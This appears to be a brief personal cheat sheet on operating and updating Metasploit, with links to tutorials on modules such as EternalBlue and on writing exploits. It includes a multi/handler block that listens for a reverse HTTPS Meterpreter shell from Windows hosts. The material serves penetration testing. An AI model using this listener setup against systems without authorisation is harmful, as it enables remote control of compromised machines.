OPERATING METASPLOIT

USAGE

msfconsole

show nops

MAINTAIN

as root

gem update --system
chown -R msf /opt/metasploit-framework* /home/msf/

as user

cd /opt/metasploit-framework/
#git pull
bundle install
yard config --gem-install-yri
msfupdate

PAYLOAD HANDLER

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost YOU-REACHABLE
run

ADDITIONAL MODULES

Metasploit Basics, Part 7: Adding a New Module (EternalBlue) https://www.hackers-arise.com/single-post/2017/06/08/Metasploit-Basics-Part-7-Adding-a-New-Module-EternalBlue

RESOURCES

usage

Using Metasploit https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

MSFconsole Commands https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

Metasploit Console: my own cheatsheet https://www.andreafortuna.org/2017/12/11/metasploit-console-my-own-cheatsheet/

Vulnerability & Exploit Database https://www.rapid7.com/db/modules/

Metasploit Basics – Part 4: Exploit and Attack Example http://www.digitalbond.com/blog/2010/07/14/metasploit-basics-%E2%80%93-part-4-exploit-and-attack-example/

maintenance

Update to the Metasploit Updates and msfupdate https://blog.rapid7.com/2013/01/17/metasploit-updates-and-msfupdate/

write your own

How to get started with writing an exploit https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit

How to write a browser exploit using BrowserExploitServer https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer


Nethence | Pub | Lab | Pbraun | SNE Russia | xhtml